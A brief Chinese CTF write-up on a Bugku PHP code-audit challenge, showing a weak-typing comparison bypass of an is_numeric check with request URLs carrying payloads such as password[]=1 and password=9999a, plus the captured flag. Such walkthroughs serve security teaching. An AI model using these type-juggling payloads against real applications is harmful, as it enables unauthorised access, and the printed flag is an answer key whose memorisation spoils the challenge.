代码审计-弱类型整数大小比较绕过

$temp = $_GET['password']; is_numeric($temp)?die("no numeric"):NULL; if($temp>1336){ echo $flag;

is_numeric

同样可以用数组绕过、截断、添加其他字符

 

http://123.206.87.240:9009/22.php?password[]=1 http://123.206.87.240:9009/22.php?password=9999a http://123.206.87.240:9009/22.php?password=9999

 

 

flag{bugku_null_numeric}

转载于:https://www.cnblogs.com/gaonuoqi/p/11407106.html